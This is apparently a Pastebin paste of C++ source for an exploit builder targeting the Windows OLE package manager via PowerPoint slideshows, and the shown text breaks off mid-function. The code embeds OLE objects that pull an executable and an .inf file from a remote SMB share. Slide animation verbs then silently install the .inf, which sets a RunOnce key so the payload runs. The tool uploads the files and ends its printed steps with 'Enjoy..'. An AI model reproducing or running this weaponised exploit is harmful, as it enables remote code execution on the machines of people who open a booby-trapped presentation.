API tools faq
paste
Advertisement
Guest User

?

a guest
Oct 18th, 2014
7,592
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 35.92 KB | None | 0 0
raw download clone embed print report
  1. /*++
  2. Title:
  3. Windows NT 6.X OLE package manager remote code execution through
  4. MS Office Powerpoint XYZ slideshow (ppts, pptxs).
  5.  
  6. EID:
  7. 00000217:2013/06/10
  8.  
  9. Description:
  10. Undocumented features exist in Windows NT 6 OLE package manager.
  11. These features allow to bypass 'Safe download' mechanism from
  12. untrusted sources and to execute imm. The IContextMenu i-face
  13. is used by 3-rd party software (such as MS Office Powerpoint XYZ)
  14. to unpack and dispatch package data. Shell action to be applied
  15. to package is specified by action id in 'cmd' parameter of slide
  16. xml-based document. Action Id '-1' and '-2' are reserved by MS
  17. Office Powerpoint engine. Currently, silent '.inf' installation
  18. is used for mitigation bypass. The MS Office for Windows XP
  19. contains internal OLE Package interpreter, so Windows XP doesn't
  20. affected.
  21. Hi F-5ecure and E5et! We are offering you to patch holes and
  22. backdoors in your fucking AV-s. We know about them.
  23.  
  24. Discovered:
  25. 2013/06/06
  26.  
  27. --*/
  28.  
  29. #include <Windows.h>
  30. #include <OleAuto.h>
  31. #include <stdio.h>
  32. #include <OAIdl.h>
  33. #include <string>
  34. #include <shldisp.h>
  35. #include <tlhelp32.h>
  36. #include <assert.h>
  37.  
  38. using namespace std;
  39.  
  40. #define MAKE_OFFICE_IMPORT 0
  41.  
  42. #if MAKE_OFFICE_IMPORT
  43. #import "z:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\VBA6\\VBE6EXT.OLB"
  44. #import "z:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE12\\mso.dll"
  45. #import "z:\\Program Files (x86)\\Microsoft Office\\Office12\\msppt.olb"
  46.  
  47. /* Modify office headers after import.
  48. In file vbe6ext.tlh specify:
  49. #include "mso.tlh"
  50. using namespace Office;
  51.  
  52. In file msppt.tlh specify:
  53. #include "vbe6ext.tlh"
  54. using namespace VBIDE;
  55. */
  56.  
  57. #else
  58.  
  59. #if _DEBUG
  60.  
  61. #include "Debug\mso.tlh"
  62. #include "Debug\vbe6ext.tlh"
  63. #include "Debug\msppt.tlh"
  64.  
  65. #else
  66.  
  67. #include "Release\mso.tlh"
  68. #include "Release\vbe6ext.tlh"
  69. #include "Release\msppt.tlh"
  70.  
  71. #endif
  72.  
  73. #endif
  74.  
  75. /* Processor definitions
  76. */
  77. static HRESULT __G_hresult = S_OK;
  78.  
  79. #define CHK_HR( hr ) do { if (FAILED(__G_hresult = (hr))) { goto _Done; } } while(0)
  80.  
  81. #define CHK_ALLOC( ptr ) do { if ((ptr) == NULL) {goto _Done; } } while(0)
  82.  
  83. #define SAFE_RELEASE_BY_REF( obj ) do { if((*obj) != NULL) { (*obj )->Release(); *obj = NULL;} } while(0)
  84.  
  85. #define SAFE_FREE_BSTR_BY_REF( obj ) do { if((*obj) != NULL) { SysFreeString((*obj)); (*obj) = NULL;} } while(0)
  86.  
  87. #define VariantInitAsLong( var, val) \
  88. VariantInit( &(var) ); \
  89. (var).vt = VT_I4; \
  90. (var).lVal = val;
  91.  
  92.  
  93. /*************************************************************************
  94. Rtns definition
  95. *************************************************************************/
  96. int wmain(int argc, wchar_t **argv);
  97. bool change_file_time(__in wchar_t *fname);
  98. void print_usage_and_exit(__in wchar_t *exe);
  99. bool produce_presentation(__in wchar_t *fname, __in wchar_t *fnameSaveAs, __in wchar_t *fname1Tmp, __in wchar_t *fname2Tmp);
  100. bool presentation_does_have_ole_packages(__in PowerPoint::_Presentation *pPresentation, __out bool *doesHave);
  101. bool create_ole_embed_stg_copy(__in const wchar_t *file_result, __in char *str1, __in char *str2);
  102. bool rewrite_embeddings_in_presentation(__in wchar_t *fnamePpt, __in wchar_t *fnameData);
  103. bool parse_cmd(int argc, wchar_t **argv, wstring *fnamePptIn, wstring *smbPath, wstring *fnameExe,wstring *fnameExeOnSmb,wstring *fnameInfOnSmb, bool *bForceUpload);
  104.  
  105.  
  106. /*************************************************************************
  107. Rtns implementation
  108. *************************************************************************/
  109. bool produce_presentation(__in wchar_t *fname, __in wchar_t *fnameSaveAs, __in wchar_t *fname1Tmp, __in wchar_t *fname2Tmp) {
  110.  
  111. wstring stdWstrFileSaveAs;
  112. PowerPoint::PpSaveAsFileType saveAsType;
  113. bool bres = false,
  114. bDoesHaveOlePackages = false;
  115. CLSID appClsid = { 0 };
  116. BSTR bstrApplicationProgId = NULL,
  117. bstrPresentationPath = NULL,
  118. bstrSaveAs = NULL;
  119. PowerPoint::_Application *pApplication = NULL;
  120. PowerPoint::Presentations *pPresentations = NULL;
  121. PowerPoint::_Presentation *pPresentation = NULL;
  122. PowerPoint::Slides *pSlides = NULL;
  123. PowerPoint::_Slide *pSlide = NULL;
  124. PowerPoint::Shapes *pShapes = NULL;
  125. PowerPoint::Shape *pShape0 = NULL,
  126. *pShape1 = NULL,
  127. *pShapeCurr = NULL;
  128. PowerPoint::TimeLine *pTimeLine = NULL;
  129. PowerPoint::Sequences *pSequences = NULL;
  130. PowerPoint::Sequence *pSequence = NULL;
  131. PowerPoint::Effect *pEffect = NULL;
  132. PowerPoint::AnimationBehaviors *pAnimationBehaviors = NULL;
  133. PowerPoint::AnimationBehavior *pAnimationBehavior = NULL;
  134. PowerPoint::CommandEffect *pCommandEffect = NULL;
  135. PowerPoint::SlideShowTransition *pSlideShowTransition = NULL;
  136. VARIANT varSlideIndex;
  137.  
  138.  
  139. /* Produce file name for saving
  140. */
  141. stdWstrFileSaveAs.append(fnameSaveAs);
  142.  
  143. saveAsType = PowerPoint::PpSaveAsFileType::ppSaveAsOpenXMLShow;
  144.  
  145. CHK_ALLOC( bstrApplicationProgId = SysAllocString(L"Powerpoint.Application"));
  146.  
  147. /* Obtain POwerPoint App CLSID from PowerPoint App Identifier
  148. */
  149. CHK_HR( CLSIDFromProgID( bstrApplicationProgId, &appClsid) );
  150.  
  151. /* Create instance of POWERPOINT Application
  152. */
  153. CHK_HR( CoCreateInstance(
  154. appClsid,
  155. NULL,
  156. CLSCTX_LOCAL_SERVER,
  157. __uuidof(PowerPoint::_Application),
  158. (LPVOID*)&pApplication) );
  159.  
  160. /* Get presentation collection
  161. */
  162. CHK_HR( pApplication ->get_Presentations(&pPresentations) );
  163.  
  164. /* Open presentation
  165. */
  166. CHK_ALLOC( bstrPresentationPath = SysAllocString(fname) );
  167.  
  168. CHK_HR( pPresentations ->raw_Open(
  169. bstrPresentationPath,
  170. Office::MsoTriState::msoFalse,
  171. Office::MsoTriState::msoFalse,
  172. Office::MsoTriState::msoFalse,
  173. &pPresentation) );
  174.  
  175. /* Make sure that presentation doesn't have a lot of ole packages
  176. */
  177. if (!presentation_does_have_ole_packages(pPresentation, &bDoesHaveOlePackages)) {
  178.  
  179. CHK_HR( E_ABORT );
  180. }
  181.  
  182. if (bDoesHaveOlePackages) {
  183.  
  184. printf("[-] ERROR: Specified presentation already includes OLE objects or no slides found.\n");
  185.  
  186. CHK_HR( E_ABORT );
  187. }
  188.  
  189. /* Get collection of slides
  190. */
  191.  
  192. CHK_HR( pPresentation ->get_Slides( &pSlides) );
  193.  
  194. /* Get first slide by index
  195. */
  196. VariantInitAsLong(varSlideIndex, 1);
  197.  
  198. CHK_HR( pSlides ->raw_Item( varSlideIndex, &pSlide) );
  199.  
  200. /* Get collection of shapes in slide
  201. */
  202. CHK_HR( pSlide ->get_Shapes( &pShapes) );
  203.  
  204. /* Add 1-th shape to slide as first OLE object
  205. */
  206. CHK_HR( pShapes ->raw_AddOLEObject(
  207. 100.0, -100.0, 30.0, 30.0,
  208. _bstr_t(L""),
  209. _bstr_t(fname1Tmp),
  210. Office::MsoTriState::msoFalse,
  211. _bstr_t(L""),
  212. 0,
  213. _bstr_t(L""),
  214. Office::MsoTriState::msoFalse,
  215. &pShape0
  216. ) );
  217.  
  218. /* Add 2-th shape to slide as second OLE object
  219. */
  220. CHK_HR( pShapes ->raw_AddOLEObject(
  221. 150.0, -100.0, 30.0, 30.0,
  222. _bstr_t(L""),
  223. _bstr_t(fname2Tmp),
  224. Office::MsoTriState::msoFalse,
  225. _bstr_t(L""),
  226. 0,
  227. _bstr_t(L""),
  228. Office::MsoTriState::msoFalse,
  229. &pShape1
  230. ) );
  231.  
  232. /* Configure slide timing
  233. */
  234. CHK_HR( pSlide ->get_TimeLine( &pTimeLine ) );
  235.  
  236. /* Obtain Main Sequence for timeLine of slide
  237. */
  238. CHK_HR( pTimeLine ->get_MainSequence( &pSequence) );
  239.  
  240. /* Produce first effect for 1-th shape.
  241. 1-th shape specifies OLE Object which just copies .exe payload
  242. from remote SMB server and stores in temporary file.
  243. Specify command verb as '-3' which tells to ShellApi do nothing.
  244. Effect with id 1 loads slide background.
  245. Effect with id 2 loads exe stub from remote server.
  246. */
  247. {
  248. CHK_HR( pSequence ->raw_AddEffect(
  249. pShape0,
  250. PowerPoint::MsoAnimEffect::msoAnimEffectFlashOnce,
  251. PowerPoint::MsoAnimateByLevel::msoAnimateLevelNone,
  252. PowerPoint::MsoAnimTriggerType::msoAnimTriggerWithPrevious, //PowerPoint::MsoAnimTriggerType::msoAnimTriggerOnPageClick,
  253. 1,
  254. &pEffect) );
  255.  
  256. SAFE_RELEASE_BY_REF( &pEffect );
  257.  
  258. CHK_HR( pSequence ->raw_AddEffect(
  259. pShape0,
  260. PowerPoint::MsoAnimEffect::msoAnimEffectFlashOnce,
  261. PowerPoint::MsoAnimateByLevel::msoAnimateLevelNone,
  262. PowerPoint::MsoAnimTriggerType::msoAnimTriggerAfterPrevious, //PowerPoint::MsoAnimTriggerType::msoAnimTriggerOnPageClick,
  263. 2,
  264. &pEffect) );
  265.  
  266.  
  267. CHK_HR( pEffect ->get_Behaviors( &pAnimationBehaviors) );
  268.  
  269. CHK_HR( pAnimationBehaviors ->raw_Add( PowerPoint::MsoAnimType::msoAnimTypeCommand, 1, &pAnimationBehavior) );
  270.  
  271. CHK_HR( pAnimationBehavior ->get_CommandEffect( &pCommandEffect) );
  272.  
  273. CHK_HR( pCommandEffect ->put_Type( PowerPoint::MsoAnimCommandType::msoAnimCommandTypeVerb) );
  274.  
  275. CHK_HR( pCommandEffect ->put_Command( _bstr_t(L"-3")) );
  276. }
  277.  
  278. /* Release resources assigned with Shape0
  279. */
  280. SAFE_RELEASE_BY_REF( &pCommandEffect );
  281. SAFE_RELEASE_BY_REF( &pAnimationBehavior );
  282. SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
  283. SAFE_RELEASE_BY_REF( &pEffect );
  284. SAFE_RELEASE_BY_REF( &pShape0 );
  285.  
  286. /* Produce first effect for 2-th shape.
  287. 2-th shape specifies OLE Object which simple copies .inf file
  288. from remote SMB server and stores in temporary file with .inf extension.
  289. Specify command verb as '3' which tells to ShellApi do 'Install' action.
  290. Effect with id 3 loads .inf from remote server and start it.
  291. */
  292. {
  293. CHK_HR( pSequence ->raw_AddEffect(
  294. pShape1,
  295. PowerPoint::MsoAnimEffect::msoAnimEffectFlashOnce,
  296. PowerPoint::MsoAnimateByLevel::msoAnimateLevelNone,
  297. PowerPoint::MsoAnimTriggerType::msoAnimTriggerAfterPrevious,
  298. 3,
  299. &pEffect) );
  300.  
  301.  
  302. CHK_HR( pEffect ->get_Behaviors( &pAnimationBehaviors) );
  303.  
  304. CHK_HR( pAnimationBehaviors ->raw_Add( PowerPoint::MsoAnimType::msoAnimTypeCommand, 1, &pAnimationBehavior) );
  305.  
  306. CHK_HR( pAnimationBehavior ->get_CommandEffect( &pCommandEffect) );
  307.  
  308. CHK_HR( pCommandEffect ->put_Type( PowerPoint::MsoAnimCommandType::msoAnimCommandTypeVerb) );
  309.  
  310. CHK_HR( pCommandEffect ->put_Command( _bstr_t(L"3")) );
  311. }
  312. /* Release resources assigned with Shape1
  313. */
  314. SAFE_RELEASE_BY_REF( &pCommandEffect );
  315. SAFE_RELEASE_BY_REF( &pAnimationBehavior );
  316. SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
  317. SAFE_RELEASE_BY_REF( &pEffect );
  318. SAFE_RELEASE_BY_REF( &pShape1 );
  319.  
  320. /* Configure SlideShowTransition
  321. */
  322.  
  323. CHK_HR( pSlide ->get_SlideShowTransition(&pSlideShowTransition) );
  324.  
  325. CHK_HR( pSlideShowTransition ->put_EntryEffect( PowerPoint::PpEntryEffect::ppEffectBoxOut ) );
  326.  
  327. CHK_HR( pSlideShowTransition ->put_AdvanceTime( 0.5 ) );
  328.  
  329. SAFE_RELEASE_BY_REF( &pSlideShowTransition );
  330.  
  331.  
  332. /* Release resources assigned with Presentation
  333. */
  334. SAFE_RELEASE_BY_REF( &pSequence );
  335. SAFE_RELEASE_BY_REF( &pTimeLine );
  336. SAFE_RELEASE_BY_REF( &pShapes );
  337. SAFE_RELEASE_BY_REF( &pSlide );
  338. SAFE_RELEASE_BY_REF( &pSlides );
  339.  
  340.  
  341. /* Save presentation
  342. */
  343. CHK_ALLOC(bstrSaveAs = SysAllocString(stdWstrFileSaveAs.c_str()) );
  344.  
  345. CHK_HR( pPresentation ->raw_SaveAs( bstrSaveAs, saveAsType, Office::MsoTriState::msoTriStateMixed) );
  346.  
  347. bres = true;
  348.  
  349. _Done:
  350.  
  351. VariantClear( &varSlideIndex );
  352.  
  353. SAFE_FREE_BSTR_BY_REF( &bstrPresentationPath );
  354.  
  355. SAFE_FREE_BSTR_BY_REF( &bstrApplicationProgId );
  356.  
  357. SAFE_FREE_BSTR_BY_REF( &bstrSaveAs );
  358.  
  359. /* Release resources assigned with Shape0 and Shape1
  360. */
  361. SAFE_RELEASE_BY_REF( &pCommandEffect );
  362. SAFE_RELEASE_BY_REF( &pAnimationBehavior );
  363. SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
  364. SAFE_RELEASE_BY_REF( &pEffect );
  365. SAFE_RELEASE_BY_REF( &pShape0 );
  366. SAFE_RELEASE_BY_REF( &pShape1 );
  367.  
  368. /* Release resources assigned with Presentation
  369. */
  370. SAFE_RELEASE_BY_REF( &pSlideShowTransition );
  371. SAFE_RELEASE_BY_REF( &pSequence );
  372. SAFE_RELEASE_BY_REF( &pTimeLine );
  373. SAFE_RELEASE_BY_REF( &pShapes );
  374. SAFE_RELEASE_BY_REF( &pSlide );
  375. SAFE_RELEASE_BY_REF( &pSlides );
  376.  
  377. /* Close Currently opened presentation
  378. */
  379. if (pPresentation) {
  380.  
  381. pPresentation ->raw_Close();
  382. }
  383. SAFE_RELEASE_BY_REF( &pPresentation );
  384.  
  385. SAFE_RELEASE_BY_REF( &pPresentations );
  386.  
  387. /* Close powerpoint automation application
  388. */
  389. if (pApplication) {
  390.  
  391. pApplication ->raw_Quit();
  392. }
  393.  
  394. SAFE_RELEASE_BY_REF( &pApplication );
  395.  
  396. return bres;
  397. }
  398.  
  399. bool create_ole_embed_stg_copy(__in const wchar_t *file_result, __in char *str1, __in char *str2) {
  400.  
  401. bool bresult = false;
  402. IStorage *pStorage = NULL;
  403. IStream *pStream = NULL;
  404. HRESULT hresult = S_OK;
  405. CLSID clsidMedia = {0};
  406. VOID *pvFileData = NULL;
  407. size_t dataSize = 0;
  408. ULONG bytesWritten = 0;
  409. char trailer = 0;
  410. wstring stdWstrFileNameOut;
  411.  
  412.  
  413. stdWstrFileNameOut.append(file_result);
  414.  
  415. hresult =
  416. StgCreateStorageEx(
  417. stdWstrFileNameOut.c_str(),
  418. STGM_CREATE | STGM_SHARE_EXCLUSIVE | STGM_READWRITE,
  419. STGFMT_STORAGE,
  420. 0,
  421. NULL,
  422. NULL,
  423. IID_IStorage,
  424. (void**)&pStorage
  425. );
  426.  
  427. if (FAILED(hresult)) {
  428.  
  429. //printf("[-] %s(): StgCreateStorageEx failed with error: %d(%08x)\r\n", __FUNCTION__, hresult, hresult);
  430.  
  431. CHK_HR(hresult);
  432. }
  433.  
  434. hresult =
  435. pStorage ->CreateStream(
  436. L"\x01OLE10Native",
  437. STGM_CREATE | STGM_SHARE_EXCLUSIVE | STGM_READWRITE,
  438. 0,
  439. 0,
  440. &pStream
  441. );
  442.  
  443. if (FAILED(hresult)) {
  444.  
  445. //printf("[-] %s(): IStorage::CreateStream failed with error: %d(%08x)\r\n", __FUNCTION__, hresult, hresult);
  446.  
  447. CHK_HR(hresult);
  448. }
  449.  
  450. dataSize = strlen(str1) + 1 + strlen(str2) + 1;
  451.  
  452.  
  453. // write header
  454. hresult = pStream ->Write( &dataSize, (ULONG)4, &bytesWritten );
  455.  
  456. if (FAILED(hresult)) {
  457.  
  458. //printf("[-] %s(): IStream::Write(header) failed with error %d(%08x)\r\n", __FUNCTION__, hresult, hresult);
  459.  
  460. CHK_HR(E_ABORT);
  461. }
  462.  
  463. // write string 1
  464. hresult = pStream ->Write( str1, (ULONG)strlen(str1), &bytesWritten );
  465.  
  466. if (FAILED(hresult)) {
  467.  
  468. //printf("[-] %s(): IStream::Write(string#1) failed with error %d(%08x)\r\n", __FUNCTION__, hresult, hresult);
  469.  
  470. CHK_HR(E_ABORT);
  471. }
  472.  
  473. // write string 1 trailer
  474. hresult = pStream ->Write( &trailer, (ULONG)1, &bytesWritten );
  475.  
  476. if (FAILED(hresult)) {
  477.  
  478. //printf("[-] %s(): IStream::Write(string#1 trailer) failed with error %d(%08x)\r\n", __FUNCTION__, hresult, hresult);
  479.  
  480. CHK_HR(E_ABORT);
  481. }
  482.  
  483. // write string 2
  484. hresult = pStream ->Write( str2, (ULONG)strlen(str2), &bytesWritten );
  485.  
  486. if (FAILED(hresult)) {
  487.  
  488. //printf("[-] %s(): IStream::Write(string#2) failed with error %d(%08x)\r\n", __FUNCTION__, hresult, hresult);
  489.  
  490. CHK_HR(E_ABORT);
  491. }
  492.  
  493. // write string 2 trailer
  494. hresult = pStream ->Write( &trailer, (ULONG)1, &bytesWritten );
  495.  
  496. if (FAILED(hresult)) {
  497.  
  498. //printf("[-] %s(): IStream::Write(string#2 trailer) failed with error %d(%08x)\r\n", __FUNCTION__, hresult, hresult);
  499.  
  500. CHK_HR(E_ABORT);
  501. }
  502.  
  503. // write class of storage
  504. hresult = CLSIDFromString( L"{00022602-0000-0000-C000-000000000046}", &clsidMedia);
  505.  
  506. if (FAILED(hresult)) {
  507.  
  508. //printf("[-] %s(): CLSIDFromString failed with error %d(%08x)\r\n", __FUNCTION__, hresult, hresult);
  509.  
  510. CHK_HR(E_ABORT);
  511. }
  512.  
  513. hresult = WriteClassStg(pStorage, clsidMedia);
  514.  
  515. if (FAILED(hresult)) {
  516.  
  517. //printf("[-] %s(): WriteClassStg failed with error %d(%08x)\r\n", __FUNCTION__, hresult, hresult);
  518.  
  519. CHK_HR(hresult);
  520. }
  521.  
  522. //printf("[+] %s(): Storage %S created.\r\n", __FUNCTION__, file_result);
  523. change_file_time( (wchar_t*)stdWstrFileNameOut.c_str() );
  524.  
  525. bresult = true;
  526.  
  527. _Done:
  528. SAFE_RELEASE_BY_REF( &pStream );
  529.  
  530. SAFE_RELEASE_BY_REF( &pStorage );
  531.  
  532. if(pvFileData) {
  533.  
  534. free(pvFileData);
  535. }
  536.  
  537. return bresult;
  538.  
  539. }
  540.  
  541. bool create_somthing_file(wchar_t *fpath) {
  542.  
  543. HANDLE hFile = INVALID_HANDLE_VALUE;
  544. DWORD bytesWritten = 0;
  545.  
  546. hFile = CreateFileW(fpath, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
  547. if (hFile == INVALID_HANDLE_VALUE || hFile == NULL) {
  548.  
  549. wprintf(L"[-] ERROR: Cannot create temporary file %s with some data\n", fpath);
  550.  
  551. return false;
  552. }
  553.  
  554. if (FALSE == WriteFile( hFile, "Some Data\n", strlen("Some Data\n"), &bytesWritten, NULL)) {
  555.  
  556. wprintf(L"[-] ERROR: Cannot write temporary file %s with some data\n", fpath);
  557.  
  558. CloseHandle(hFile);
  559.  
  560. return false;
  561. }
  562.  
  563. CloseHandle(hFile);
  564.  
  565. return true;
  566. }
  567.  
  568. bool generate_inf_file(wchar_t *fnameInf, wchar_t *fnameExeOnSmb) {
  569.  
  570. HANDLE hFile = INVALID_HANDLE_VALUE;
  571. DWORD bytesWritten = 0;
  572. wstring stdFnameExeOnSmb;
  573. string stdFnameExeOnSmbA;
  574. string data;
  575. BOOL bres = FALSE;
  576.  
  577. stdFnameExeOnSmb.append(fnameExeOnSmb);
  578. stdFnameExeOnSmbA.append(stdFnameExeOnSmb.begin(), stdFnameExeOnSmb.end());
  579.  
  580. hFile = CreateFileW( fnameInf, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
  581. if (hFile == INVALID_HANDLE_VALUE || hFile == NULL) {
  582.  
  583. wprintf(L"[-] ERROR: Cannot create temporary file %s with some data\n", fnameInf);
  584.  
  585. return false;
  586. }
  587.  
  588. data.append("; 61883.INF\n");
  589. data.append("; Copyright (c) Microsoft Corporation. All rights reserved.\n\n");
  590.  
  591. data.append("[Version]\n");
  592. data.append("Signature = \"$CHICAGO$\"\n");
  593. data.append("Class=61883\n");
  594. data.append("ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}\n");
  595. data.append("Provider=%Msft%\n");
  596. data.append("DriverVer=06/21/2006,6.1.7600.16385\n\n");
  597.  
  598. data.append("[DestinationDirs]\n");
  599. data.append("DefaultDestDir = 1\n\n");
  600.  
  601. data.append("[DefaultInstall]\n");
  602. data.append("RenFiles = RxRename\n");
  603. data.append("AddReg = RxStart\n\n");
  604.  
  605. data.append("[RxRename]\n");
  606. data.append(stdFnameExeOnSmbA.c_str());
  607. data.append(".exe, ");
  608. data.append(stdFnameExeOnSmbA.c_str());
  609. data.append("\n");
  610.  
  611. data.append("[RxStart]\n");
  612. data.append("HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,%1%\\");
  613. data.append(stdFnameExeOnSmbA.c_str());
  614. data.append(".exe\n");
  615.  
  616. bres = WriteFile(hFile, data.c_str(), data.length(), &bytesWritten, NULL);
  617.  
  618. FlushFileBuffers(hFile);
  619.  
  620. CloseHandle(hFile);
  621.  
  622. return (bres);
  623. }
  624.  
  625. int wmain(int argc, wchar_t **argv) {
  626.  
  627.  
  628. wstring stdWstrSaveAs,
  629. stdWstrObject1,
  630. stdWstrObject2,
  631. stdWstrSavedAs;
  632.  
  633. wstring stdFnamePptIn,
  634. stdSmbPath,
  635. stdFnameExe,
  636. stdFnameExeOnSmb,
  637. stdFnameInfOnSmb,
  638. stdPathExeOnSmb,
  639. stdPathInfOnSmb,
  640. stdPathTmp1,
  641. stdPathTmp2,
  642. stdPathInf,
  643. stdPathExe;
  644. string stdPathExeOnSmbA,
  645. stdPathInfOnSmbA;
  646.  
  647. bool bForceUpload = false;
  648.  
  649. wchar_t currDir[MAX_PATH];
  650.  
  651.  
  652. GetCurrentDirectoryW(MAX_PATH, currDir);
  653.  
  654.  
  655. if (!parse_cmd(argc, argv, &stdFnamePptIn, &stdSmbPath, &stdFnameExe, &stdFnameExeOnSmb, &stdFnameInfOnSmb, &bForceUpload ) ) {
  656.  
  657. printf("[-] ERROR: invalid input\n");
  658.  
  659. return 0;
  660. }
  661.  
  662.  
  663. CHK_HR( CoInitializeEx(NULL, COINIT_APARTMENTTHREADED));
  664.  
  665. stdWstrSaveAs.append(stdFnamePptIn.c_str());
  666.  
  667. stdWstrSaveAs.append(L".saved.ppsx");
  668.  
  669. /* Construct a path to exe on SMB as %stdSmbPath%\%stdFnameExeOnSmb%
  670. */
  671. stdPathExeOnSmb.append(stdSmbPath.c_str());
  672. stdPathExeOnSmb.append(L"\\");
  673. stdPathExeOnSmb.append(stdFnameExeOnSmb.c_str());
  674. stdPathExeOnSmbA.append(stdPathExeOnSmb.begin(), stdPathExeOnSmb.end());
  675.  
  676. /* Construct a path to inf on SMB as %stdSmbPath%\%stdFnameInfOnSmb%
  677. */
  678. stdPathInfOnSmb.append(stdSmbPath.c_str());
  679. stdPathInfOnSmb.append(L"\\");
  680. stdPathInfOnSmb.append(stdFnameInfOnSmb.c_str());
  681. stdPathInfOnSmbA.append(stdPathInfOnSmb.begin(), stdPathInfOnSmb.end());
  682.  
  683. /* Construct a path to tmp1 file
  684. */
  685. stdPathTmp1.append(currDir);
  686. stdPathTmp1.append(L"\\tmp1.tmp");
  687.  
  688. if (!create_somthing_file((wchar_t*)stdPathTmp1.c_str()) ) {
  689.  
  690. CHK_HR(E_ABORT);
  691. }
  692.  
  693. /* Construct a path to tmp2 file
  694. */
  695. stdPathTmp2.append(currDir);
  696. stdPathTmp2.append(L"\\tmp2.tmp");
  697.  
  698. if (!create_somthing_file((wchar_t*)stdPathTmp2.c_str()) ) {
  699.  
  700. CHK_HR(E_ABORT);
  701. }
  702.  
  703.  
  704. /* Modify presentation imm
  705. */
  706. if (!produce_presentation(
  707. (wchar_t*)stdFnamePptIn.c_str(),
  708. (wchar_t *)stdWstrSaveAs.c_str(),
  709. (wchar_t *) stdPathTmp1.c_str(),
  710. (wchar_t *) stdPathTmp2.c_str()
  711. ) )
  712. {
  713.  
  714. printf("[-] ERROR: cannot update presentation\n");
  715.  
  716. CHK_HR( E_ABORT);
  717. }
  718.  
  719. /* Create OLE 1-th Object
  720. */
  721. stdWstrObject1.append(currDir);
  722. stdWstrObject1.append(L"\\");
  723. stdWstrObject1.append(L"oleObject1.bin");
  724.  
  725. if (!create_ole_embed_stg_copy(stdWstrObject1.c_str(), "EmbeddedStg1.txt", (char*)stdPathExeOnSmbA.c_str()) ) {
  726.  
  727. printf("[-] ERROR: cannot create 1-th OLE Object\n");
  728.  
  729. CHK_HR( E_ABORT);
  730. }
  731.  
  732. /* Create OLE 2-th Object
  733. */
  734. stdWstrObject2.append(currDir);
  735. stdWstrObject2.append(L"\\");
  736. stdWstrObject2.append(L"oleObject2.bin");
  737. if (!create_ole_embed_stg_copy(stdWstrObject2.c_str(), "EmbeddedStg2.txt", (char*)stdPathInfOnSmbA.c_str()) ) {
  738.  
  739. printf("[-] ERROR: cannot create 2-th OLE Object\n");
  740.  
  741. CHK_HR( E_ABORT);
  742. }
  743.  
  744. /* Generate inf file
  745. */
  746. stdPathInf.append(currDir);
  747. stdPathInf.append(L"\\");
  748. stdPathInf.append(stdFnameInfOnSmb.c_str());
  749.  
  750. if (!generate_inf_file((wchar_t*)stdPathInf.c_str(), (wchar_t*)stdFnameExeOnSmb.c_str())) {
  751.  
  752. printf("[-] ERROR: Cannot generate inf file\n");
  753. CHK_HR(E_ABORT);
  754. }
  755.  
  756. /* Generate exe for SMB
  757. */
  758. stdPathExe.append(currDir);
  759. stdPathExe.append(L"\\");
  760. stdPathExe.append(stdFnameExeOnSmb.c_str());
  761.  
  762. if (!CopyFileW(stdFnameExe.c_str(), stdPathExe.c_str(), FALSE)) {
  763. wprintf(L"[-] ERROR: Cannot create '%s' from '%s'\n", stdFnameExeOnSmb.c_str(), stdFnameExe.c_str());
  764.  
  765. CHK_HR(E_ABORT);
  766. }
  767.  
  768. /* Upload files onto remote shared folder
  769. */
  770. if (bForceUpload) {
  771.  
  772. if (!CopyFileW( stdPathExe.c_str(), stdPathExeOnSmb.c_str(), FALSE)) {
  773.  
  774. wprintf(L"[-] ERROR: Cannot upload .exe file '%s' to '%s'\n", stdPathExe.c_str(), stdSmbPath.c_str());
  775. }
  776.  
  777. if (!CopyFileW( stdPathInf.c_str(), stdPathInfOnSmb.c_str(), FALSE)) {
  778.  
  779. wprintf(L"[-] ERROR: Cannot upload .inf file '%s' to '%s'\n", stdPathInf.c_str(), stdSmbPath.c_str());
  780. }
  781. }
  782. int step = 1;
  783. wprintf(L"[+] INFO: \n");
  784. wprintf(L" %d) Rename presentation file '%s' to '%s.zip';\n", step++, stdWstrSavedAs.c_str(), stdWstrSavedAs.c_str());
  785. wprintf(L" %d) Stupid MS developers cann't create API for zip, so unzip '%s.zip'\n", step++, stdWstrSavedAs.c_str());
  786. wprintf(L" %d) Copy '%s' into 'ppt/embeddings' sub-directory of unzipped file;\n", step++, stdWstrObject1.c_str());
  787. wprintf(L" %d) Copy '%s' into 'ppt/embeddings' sub-directory of unzipped file;\n", step++, stdWstrObject2.c_str());
  788. wprintf(L" %d) Zip unzipped presentation and rename to presentation with '.ppsx'\n", step++);
  789. if (bForceUpload) {
  790. wprintf(L" %d) Copy '%s' into '%s'\n", step++, stdFnameExeOnSmb.c_str(), stdSmbPath.c_str());
  791. wprintf(L" %d) Copy '%s' into '%s'\n", step++, stdFnameInfOnSmb.c_str(), stdSmbPath.c_str());
  792. }
  793. wprintf(L" %d) Enjoy..\n", step++);
  794.  
  795.  
  796. _Done:
  797.  
  798. DeleteFileW( stdPathTmp1.c_str());
  799.  
  800. DeleteFileW( stdPathTmp2.c_str());
  801.  
  802. CoUninitialize();
  803.  
  804. return(__G_hresult);
  805. }
  806.  
  807. bool presentation_does_have_ole_packages(__in PowerPoint::_Presentation *pPresentation, __out bool *doesHave) {
  808.  
  809. bool bres = false;
  810. PowerPoint::Slides *pSlides = NULL;
  811. PowerPoint::_Slide *pSlide = NULL;
  812. PowerPoint::Shapes *pShapes = NULL;
  813. PowerPoint::Shape *pShape = NULL;
  814. PowerPoint::OLEFormat *pOLEFormat = NULL;
  815. long slidesCount = 0;
  816. VARIANT varSlideIndex,
  817. varShapeIndex;
  818. int shapesCount = 0;
  819. MsoAutoShapeType shapeType;
  820. BSTR bstrProgId = NULL;
  821. IDispatch *pOLEDispObject = NULL;
  822.  
  823.  
  824.  
  825. assert(doesHave != NULL);
  826. assert(pPresentation != NULL);
